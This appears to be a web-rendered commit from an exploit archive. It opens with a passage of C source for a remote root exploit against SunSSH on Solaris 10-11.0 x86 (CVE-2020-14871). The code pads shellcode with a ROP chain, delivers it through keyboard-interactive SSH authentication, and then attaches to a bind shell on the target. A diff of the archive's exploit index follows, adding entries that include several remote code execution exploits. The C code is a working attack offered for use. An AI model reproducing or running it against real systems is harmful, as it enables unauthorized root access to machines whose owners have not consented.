memset(sockbuf,0,sockbuflen);
|
||||
snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
|
||||
write(sd,sockbuf,strlen(sockbuf));
|
||||
while (1) {
|
||||
FD_ZERO(&readfds);
|
||||
FD_SET(0,&readfds);
|
||||
FD_SET(sd,&readfds);
|
||||
select(255,&readfds,NULL,NULL,NULL);
|
||||
if (FD_ISSET(sd, &readfds)) {
|
||||
memset(sockbuf,0,sockbuflen);
|
||||
rcv = read(sd,sockbuf,sockbuflen);
|
||||
if (rcv <= 0) {
|
||||
printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
|
||||
exit(-1);
|
||||
}
|
||||
printf("%s",sockbuf);
|
||||
fflush(stdout);
|
||||
}
|
||||
if(FD_ISSET(0,&readfds)) {
|
||||
memset(sockbuf,0,sockbuflen);
|
||||
read(0,sockbuf,sockbuflen);
|
||||
write(sd,sockbuf,strlen(sockbuf));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void bindshell_setup(short port){
|
||||
oldsd = sd;
|
||||
sd = socket(AF_INET,SOCK_STREAM,0);
|
||||
sain.sin_port = htons(port);
|
||||
if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
|
||||
printf("[!] fatal bind shell failed\n\e[0m");
|
||||
exit(-1);
|
||||
}
|
||||
printf("[-] connected.. enjoy :)\e[0m\n");
|
||||
spawn_shell(sd);
|
||||
}
|
||||
|
||||
void on_alarm(int signum){
|
||||
printf("[+] exploit success, handling payload...\n");
|
||||
if(ishell==0||ishell==2){
|
||||
bindshell_setup(9999);
|
||||
}
|
||||
if(ishell==1||ishell==3){
|
||||
bindshell_setup(8080);
|
||||
}
|
||||
printf("[-] exploit complete\n\e[0m");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void on_interrupt(int signum){
|
||||
printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
|
||||
if(sd){
|
||||
close(sd);
|
||||
}
|
||||
if(oldsd){
|
||||
close(oldsd);
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
|
||||
#define payload_size 4096
|
||||
int len = strlen(payload);
|
||||
buf = malloc(payload_size);
|
||||
char randchar = 'A';
|
||||
char* randbuf = malloc(2);
|
||||
if(!buf||!randbuf){
|
||||
printf("[!] fatal payload buffer error\n");
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
memset(buf,'\x00',payload_size);
|
||||
memset(randbuf,0,2);
|
||||
printf("[-] shellcode length %d bytes\n",len);
|
||||
if(len < 512 && payload_size > 1024){
|
||||
memcpy(buf,payload,len);
|
||||
for(int i =0;i <= (512 - len);i++){
|
||||
randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
|
||||
memcpy(randbuf,&randchar,1);
|
||||
strcat(buf,randbuf);
|
||||
}
|
||||
len = strlen(retaddr);
|
||||
printf("[-] rop chain length %d\n",len);
|
||||
if(len + 512 < payload_size){
|
||||
memcpy((void*)(long)buf+512,(void*)retaddr,len);
|
||||
len = strlen(buf);
|
||||
printf("[-] exploit buffer length %d\n",len);
|
||||
}
|
||||
else{
|
||||
printf("[!] exploit buffer miscalculated\n");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
else{
|
||||
printf("[!] exploit buffer miscalculated\n");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
||||
static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
|
||||
int i = 0;
|
||||
signal(SIGALRM, &on_alarm);
|
||||
printf("[+] entering keyboard-interactive authentication.\n");
|
||||
printf("[-] number of prompts: %d\n", num_prompts);
|
||||
printf("[-] prompt %d from server: '", i);
|
||||
fwrite(prompts[i].text, 1, prompts[i].length, stdout);
|
||||
printf("'\n");
|
||||
prepare_payload();
|
||||
//uncomment to pause for gdb debugging
|
||||
//sleep(10);
|
||||
responses[i].text = strdup(buf);
|
||||
responses[i].length = strlen(buf);
|
||||
printf("[-] sending exploit magic buffer... wait\n");
|
||||
alarm(5);
|
||||
}
|
||||
|
||||
int main(int argc,char **argv){
|
||||
int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
|
||||
char* host;
|
||||
int i, type, exitcode;
|
||||
unsigned long hostaddr;
|
||||
const char *fingerprint;
|
||||
LIBSSH2_SESSION *session;
|
||||
LIBSSH2_CHANNEL *channel;
|
||||
char *exitsignal = (char *)"none";
|
||||
size_t len;
|
||||
LIBSSH2_KNOWNHOSTS *nh;
|
||||
static struct option options[] = {
|
||||
{"server", 1, 0, 's'},
|
||||
{"port", 1, 0, 'p'},
|
||||
{"target", 1, 0, 't'},
|
||||
{"shellcode", 1, 0, 'x'},
|
||||
{"help", 0, 0,'h'}
|
||||
};
|
||||
printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
|
||||
while(rc != -1) {
|
||||
rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
|
||||
switch(rc) {
|
||||
case -1:
|
||||
break;
|
||||
case 's':
|
||||
if(ihost==0){
|
||||
host = malloc(strlen(optarg) + 1);
|
||||
if(host){
|
||||
sprintf(host,"%s",optarg);
|
||||
ihost = 1;
|
||||
}
|
||||
}
|
||||
break;
|
||||
case 'p':
|
||||
port = atoi(optarg);
|
||||
break;
|
||||
case 'x':
|
||||
if(ishell==-1) {
|
||||
rc = atoi(optarg);
|
||||
switch(rc){
|
||||
case 0:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
case 1:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
case 2:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
case 3:
|
||||
printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
|
||||
payload = malloc(strlen(shellcodes[rc].shellcode)+1);
|
||||
if(payload){
|
||||
memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
|
||||
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
|
||||
ishell = rc;
|
||||
}
|
||||
break;
|
||||
|
||||
default:
|
||||
printf("[!] Invalid shellcode selection %d\n",rc);
|
||||
exit(0);
|
||||
break;
|
||||
}
|
||||
}
|
||||
break;
|
||||
case 't':
|
||||
if(itarg==0){
|
||||
rc = atoi(optarg);
|
||||
switch(rc){
|
||||
case 0:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 1:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 2:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 3:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
case 4:
|
||||
printf("[-] chosen target '%s'\n",targets[rc].name);
|
||||
retaddr = malloc(strlen(targets[rc].ropchain)+1);
|
||||
if(retaddr){
|
||||
memset(retaddr,0,strlen(targets[rc].ropchain)+1);
|
||||
memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
|
||||
itarg = rc;
|
||||
}
|
||||
break;
|
||||
default:
|
||||
printf("[!] Invalid target selection %d\n", rc);
|
||||
exit(0);
|
||||
break;
|
||||
}
|
||||
itarg = 1;
|
||||
}
|
||||
break;
|
||||
case 'h':
|
||||
printf("[!] Usage instructions.\n[\n");
|
||||
printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]);
|
||||
printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n");
|
||||
printf("[ --shellcode|-x <shellcode#>\n[\n");
|
||||
printf("[ Target#'s\n");
|
||||
for(i = 0;i <= targetno - 1;i++){
|
||||
printf("[ %d \"%s\"\n",i,targets[i]);
|
||||
}
|
||||
printf("[\n[ Shellcode#'s\n");
|
||||
for(i = 0;i <= shellno - 1;i++){
|
||||
printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
|
||||
}
|
||||
printf("\e[0m");
|
||||
exit(0);
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
}
|
||||
if(itarg != 1 || ihost != 1 || ishell < 0){
|
||||
printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
rc = libssh2_init(0);
|
||||
hostaddr = inet_addr(host);
|
||||
sd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
sain.sin_family = AF_INET;
|
||||
sain.sin_port = htons(port);
|
||||
sain.sin_addr.s_addr = hostaddr;
|
||||
if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
|
||||
fprintf(stderr, "[!] failed to connect!\n");
|
||||
goto shutdown;
|
||||
}
|
||||
session = libssh2_session_init();
|
||||
libssh2_session_set_blocking(session, 1);
|
||||
while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
|
||||
if(rc) {
|
||||
printf("[!] failure establishing ssh session: %d\n", rc);
|
||||
goto shutdown;
|
||||
}
|
||||
nh = libssh2_knownhost_init(session);
|
||||
if(!nh) {
|
||||
printf("[!] failure on libssh2 init\n");
|
||||
goto shutdown;
|
||||
}
|
||||
fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
|
||||
printf("[+] ssh host fingerprint: ");
|
||||
for(i = 0; i < 20; i++) {
|
||||
printf("%02x", (unsigned char)fingerprint[i]);
|
||||
}
|
||||
printf("\n");
|
||||
libssh2_knownhost_free(nh);
|
||||
signal(SIGINT,&on_interrupt);
|
||||
libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
|
||||
printf("[!] exploit failed, core maybe on target!\n");
|
||||
shutdown:
|
||||
if(sd){
|
||||
close(sd);
|
||||
}
|
||||
printf("\e[0m");
|
||||
return -2;
|
||||
}
|
|
@ -11231,6 +11231,7 @@ id,file,description,date,author,type,platform,port
|
|||
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
|
||||
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
|
||||
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
|
||||
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18340,6 +18341,7 @@ id,file,description,date,author,type,platform,port
|
|||
49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
|
||||
49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
|
||||
49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
|
||||
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -43476,3 +43478,6 @@ id,file,description,date,author,type,platform,port
|
|||
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
|
||||
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
|
||||
49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
|
||||
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
||||
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
||||
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue